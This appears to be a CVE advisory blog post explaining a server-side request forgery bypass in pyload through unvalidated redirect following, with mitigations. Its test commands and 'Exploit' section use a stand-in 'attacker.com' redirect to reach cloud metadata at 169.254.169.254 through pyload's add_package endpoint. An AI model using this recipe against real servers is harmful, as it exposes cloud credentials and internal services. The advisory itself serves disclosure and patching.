pyload, SSRF Bypass via Automatic Redirect Following, CVE-2026-33992 (High)

Listen to this Post

How CVE-2026-33992 Works (Original Vulnerability & Bypass)

The original CVE-2026-33992 allowed SSRF because pyload did not validate IP addresses of download URLs. An attacker could directly submit an internal address (e.g., 169.254.169.254) and pyload would fetch it. The fix added a validation function in `BaseDownloader.download()` that checks the hostname of the initial URL. If the hostname is an IP, it verifies it is global (public); if a domain, it resolves all IPs and checks each. However, the HTTP backend (pycurl) is configured with `FOLLOWLOCATION=1` and MAXREDIRS=10, meaning it automatically follows redirects. The validation is performed only once on the original URL, never on redirect targets. An authenticated user with ADD permission can supply a public URL that returns a 302 redirect to an internal address. pycurl follows the redirect silently, downloading the internal resource (e.g., cloud metadata) and saving it to pyload’s storage. This bypasses the IP validation entirely because the redirect destination is never inspected. The root cause is missing `CURLOPT_REDIR_PROTOCOLS` restrictions and lack of per-hop validation. The impact includes access to cloud metadata, internal network services, and localhost, identical to the original CVE but requiring ADD permission, reducing severity from Critical to High.

dailycve form

Platform: pyload
Version: 0.5.0 (all before patch)
Vulnerability: SSRF via redirects
Severity: High
date: 2026-04-05

Prediction: 2026-04-12

What Undercode Say:

Check if pycurl follows redirects without validation
grep -n "FOLLOWLOCATION" src/pyload/core/network/http/http_request.py
Expected output: 114: self.c.setopt(pycurl.FOLLOWLOCATION, 1)
Manual test with curl to simulate redirect SSRF
curl -v -L --max-redirs 10 'http://attacker.com/redirect' -o /dev/null
If internal IP appears in trace, vulnerable
Python one-liner to test redirect target resolution
python3 -c "import pycurl, io; c=pycurl.Curl(); c.setopt(pycurl.URL, 'http://attacker.com/redirect'); c.setopt(pycurl.FOLLOWLOCATION, 1); b=io.BytesIO(); c.setopt(pycurl.WRITEDATA, b); c.perform(); print(b.getvalue())"

Exploit:

Attacker hosts a redirect server (Python `http.server` sending 302 to http://169.254.169.254/latest/meta-data/`). Then sends POST request to pyload `/json/add_package` withadd_links=http://attacker.com:8888/redirect`. Pyload validates `attacker.com` (public IP), passes, follows redirect, downloads cloud metadata.

Protection from this CVE:

Set `FOLLOWLOCATION=0` in pycurl, implement manual redirect handling with SSRF validation at each hop. Alternatively, set `REDIR_PROTOCOLS` to restrict protocols and add a callback using `CURLOPT_OPENSOCKETFUNCTION` to validate each redirect destination IP before following.

Impact:

Authenticated users with ADD permission can exfiltrate cloud IAM credentials (AWS, GCP, Azure, DO), scan internal networks (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), and access localhost services, leading to privilege escalation and lateral movement.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top